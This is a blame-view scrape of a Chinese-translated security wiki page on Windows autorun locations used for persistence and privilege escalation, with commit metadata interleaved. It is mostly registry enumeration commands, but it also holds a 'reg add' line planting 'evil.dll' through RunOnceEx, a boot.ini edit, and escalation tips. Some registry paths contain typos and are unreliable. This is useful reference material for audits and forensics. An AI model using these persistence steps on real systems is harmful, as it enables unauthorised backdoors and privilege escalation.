-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
 								* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
 								* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run`
 								* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce`
 								* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
 								* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
 								* `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run`
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								* `HKCU\Software\Wow6432Npde\Microsoft\Windows\CurrentVersion\RunOnce`
-												GitBook: [master] 356 pages modified
											
										
										
											2020-08-05 21:47:51 +00:00
+								* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run`
-												Translated ['windows-hardening/active-directory-methodology/README.md',

											
										
										
											2024-01-02 20:35:58 +00:00
+								* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Runonce`
 								* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx`
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								被称为 **Run** 和 **RunOnce** 的注册表键旨在每次用户登录系统时自动执行程序。作为键数据值分配的命令行限制为 260 个字符或更少。
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								**服务运行** (可以控制系统启动时服务的自动启动):
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
 								* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
 								* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices`
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices`
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce`
 								* `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce`
 								* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices`
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								* `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices`
 								**RunOnceEx:**
 								* `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx`
 								* `HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx`
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								在 Windows Vista 及更高版本中，**Run** 和 **RunOnce** 注册表键不会自动生成。这些键中的条目可以直接启动程序或将它们指定为依赖项。例如，要在登录时加载 DLL 文件，可以使用 **RunOnceEx** 注册表键以及一个 "Depend" 键。通过添加一个注册表项来在系统启动时执行 "C:\temp\evil.dll" 来演示这一点:
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								```
 								reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
 								```
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								{% hint style="info" %}
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								**Exploit 1**：如果您可以在**HKLM**中的任何提到的注册表中写入内容，则可以在不同用户登录时提升权限。
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								{% endhint %}
 								{% hint style="info" %}
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								**Exploit 2**：如果您可以覆盖**HKLM**中任何注册表中指定的任何二进制文件，则可以在不同用户登录时修改该二进制文件并提升权限。
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								{% endhint %}
 								```bash
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								#CMD
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
 								reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
 								reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
 								reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
 								reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
-												GitBook: [master] 356 pages modified
											
										
										
											2020-08-05 21:47:51 +00:00
+								reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
 								reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce
 								reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
 								reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
 								reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
 								reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
 								reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
 								reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
 								reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
 								reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
 								reg query HKCU\Software\Wow5432Node\Microsoft\Windows\CurrentVersion\RunServices
 								reg query HKLM\Software\Microsoft\Windows\RunOnceEx
 								reg query HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
 								reg query HKCU\Software\Microsoft\Windows\RunOnceEx
 								reg query HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
 								#PowerShell
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
 								Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce'
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
 								Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
 								Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce'
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
 								Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
-												GitBook: [master] 356 pages modified
											
										
										
											2020-08-05 21:47:51 +00:00
+								Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run'
 								Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce'
 								Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE'
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
 								Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
 								Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
 								Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices'
 								Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices'
 								Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
 								Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
 								Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
 								Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
 								Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\RunOnceEx'
 								Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
 								Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
 								Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 启动路径
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								* `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
 								* `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
 								* `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
 								* `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								放置在**启动**文件夹中的快捷方式将在用户登录或系统重新启动期间自动触发服务或应用程序的启动。**启动**文件夹的位置在注册表中为**本地计算机**和**当前用户**范围定义。这意味着添加到这些指定**启动**位置的任何快捷方式都将确保链接的服务或程序在登录或重新启动过程后启动，这是一种安排程序自动运行的简单方法。
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
 								{% hint style="info" %}
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								如果您可以覆盖**HKLM**下的任何\[User] Shell Folder，您将能够将其指向您控制的文件夹，并放置一个后门，每当用户登录系统时都会执行，从而提升权限。
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								{% endhint %}
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								```bash
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
 								reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
 								reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
 								reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
 								Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
 								Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
 								Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
 								Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
 								```
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								### Winlogon Keys
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
 								`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								通常，**Userinit** 键被设置为 **userinit.exe**。但是，如果修改了此键，则指定的可执行文件也将由 **Winlogon** 在用户登录时启动。同样，**Shell** 键旨在指向 **explorer.exe**，这是 Windows 的默认 shell。
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								```bash
 								reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
 								reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
 								Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
 								Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
 								```
 								{% hint style="info" %}
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								如果您可以覆盖注册表值或二进制文件，则可以提升权限。
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								{% endhint %}
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 策略设置
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								* `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								* `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								检查 **Run** 键。
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								```bash
 								reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
 								reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
 								Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
 								Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								```
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								### AlternateShell
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								### 更改安全模式命令提示符
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								在Windows注册表中的 `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot` 下，默认设置了一个名为 **`AlternateShell`** 的数值，其数值为 `cmd.exe`。这意味着当您在启动时选择“带命令提示符的安全模式”（按 F8 键），将使用 `cmd.exe`。但是，可以设置计算机自动启动到此模式，而无需按 F8 并手动选择它。
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								创建一个用于自动启动“带命令提示符的安全模式”的引导选项的步骤：
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+. 更改 `boot.ini` 文件的属性，以移除只读、系统和隐藏标志：`attrib c:\boot.ini -r -s -h`
 . 打开 `boot.ini` 进行编辑。
 . 插入一行类似于：`multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)`
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+. 保存更改到 `boot.ini`。
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+. 重新应用原始文件属性：`attrib c:\boot.ini +r +s +h`
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								* **Exploit 1:** 更改 **AlternateShell** 注册表键允许设置自定义命令 shell，可能用于未经授权的访问。
 								* **Exploit 2 (PATH 写入权限):** 对系统 **PATH** 变量的任何部分具有写入权限，特别是在 `C:\Windows\system32` 之前，可以执行自定义的 `cmd.exe`，如果系统在安全模式下启动，则可能成为后门。
 								* **Exploit 3 (PATH 和 boot.ini 写入权限):** 对 `boot.ini` 的写入访问权限使安全模式自动启动，从而在下次重启时促进未经授权的访问。
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								要检查当前的 **AlternateShell** 设置，请使用以下命令：
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-04 22:50:29 +00:00
+								```bash
 								reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
 								Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'
 								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 已安装组件
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								Active Setup 是 Windows 中的一个功能，在桌面环境完全加载之前启动。它优先执行某些命令，这些命令必须在用户登录继续之前完成。这个过程甚至发生在其他启动条目之前，比如在 Run 或 RunOnce 注册表部分触发的条目。
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								Active Setup 通过以下注册表键进行管理：
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								- `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components`
 								- `HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
 								- `HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components`
 								- `HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								在这些键中，存在各种子键，每个对应一个特定的组件。特别感兴趣的键值包括：
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								- **IsInstalled:**
 								  - `0` 表示组件的命令不会执行。
-												Translated ['forensics/basic-forensic-methodology/README.md', 'forensics

											
										
										
											2024-02-09 01:27:24 +00:00
+								  - `1` 表示命令将为每个用户执行一次，这是默认行为，如果缺少 `IsInstalled` 值。
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								- **StubPath:** 定义由 Active Setup 执行的命令。它可以是任何有效的命令行，比如启动 `notepad`。
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								**安全洞察:**
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
 								- 修改或写入 `IsInstalled` 设置为 `"1"` 的键，具有特定 `StubPath` 的键可能导致未经授权的命令执行，潜在地用于特权升级。
 								- 修改任何 `StubPath` 值中引用的二进制文件也可能实现特权升级，如果有足够的权限。
 								要检查 Active Setup 组件中的 `StubPath` 配置，可以使用以下命令：
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								```bash
-												Update privilege-escalation-with-autorun-binaries.md

add missing keyword `reg` for command `reg query`
											
										
										
											2020-10-12 16:19:17 +00:00
+								reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
 								reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
 								reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
 								reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
+								```
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								### 浏览器辅助对象
 								### 浏览器辅助对象（BHOs）概述
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								浏览器辅助对象（BHOs）是DLL模块，可为微软的Internet Explorer添加额外功能。它们在每次启动时加载到Internet Explorer和Windows Explorer中。然而，通过将**NoExplorer**键设置为1，可以阻止它们在Windows Explorer实例中加载，从而阻止它们执行。
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
-												Translated ['forensics/basic-forensic-methodology/README.md', 'forensics

											
										
										
											2024-02-09 01:27:24 +00:00
+								BHOs通过Internet Explorer 11与Windows 10兼容，但不支持Microsoft Edge，这是较新版本Windows中的默认浏览器。
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
 								要查看系统上注册的BHOs，可以检查以下注册表键：
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								- `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
 								- `HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								每个BHO在注册表中由其**CLSID**表示，作为唯一标识符。有关每个CLSID的详细信息可以在`HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}`下找到。
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-05 16:26:55 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								要查询注册表中的BHOs，可以使用以下命令：
-												GitBook: [master] 356 pages modified
											
										
										
											2020-08-05 21:47:51 +00:00
+								```bash
-												Update privilege-escalation-with-autorun-binaries.md

add missing keyword `reg` for command `reg query`
											
										
										
											2020-10-12 16:19:17 +00:00
+								reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
 								reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
-												GitBook: [master] 356 pages modified
											
										
										
											2020-08-05 21:47:51 +00:00
+								```
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								### Internet Explorer Extensions
-												GitBook: [master] 356 pages modified
											
										
										
											2020-08-05 21:47:51 +00:00
 								* `HKLM\Software\Microsoft\Internet Explorer\Extensions`
 								* `HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions`
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								请注意，注册表中将包含每个dll的1个新注册表，并且将由 **CLSID** 表示。您可以在 `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}` 中找到 CLSID 信息。
-												GitBook: [master] 356 pages modified
											
										
										
											2020-08-05 21:47:51 +00:00
-												Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge

											
										
										
											2024-02-08 03:56:12 +00:00
+								### Font Drivers
-												GitBook: [master] 356 pages modified
											
										
										
											2020-08-05 21:47:51 +00:00
 								* `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers`
 								* `HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers`
 								```bash
 								reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers"
 								reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers"
 								Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers'
 								Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers'
 								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 打开命令
-												GitBook: [master] 356 pages modified
											
										
										
											2020-08-05 21:47:51 +00:00
 								* `HKLM\SOFTWARE\Classes\htmlfile\shell\open\command`
 								* `HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command`
 								```bash
 								reg query "HKLM\SOFTWARE\Classes\htmlfile\shell\open\command" /v ""
 								reg query "HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command" /v ""
 								Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\command' -Name ""
 								Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
 								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 图像文件执行选项
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								```
-												GitBook: [master] 4 pages modified
											
										
										
											2021-09-06 22:26:52 +00:00
+								HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
 								HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
 								```
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								## SysInternals
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-05 22:33:19 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:44:30 +00:00
+								请注意，您可以找到自动运行的所有站点都已经被**winpeas.exe**搜索过。但是，为了获得更全面的自动执行文件列表，您可以使用[systinternals的autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)。
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								```
-												GitBook: [master] 2 pages modified
											
										
										
											2020-08-05 22:33:19 +00:00
+								autorunsc.exe -m -nobanner -a * -ct /accepteula
 								```
-												Translated to Chinese

											
										
										
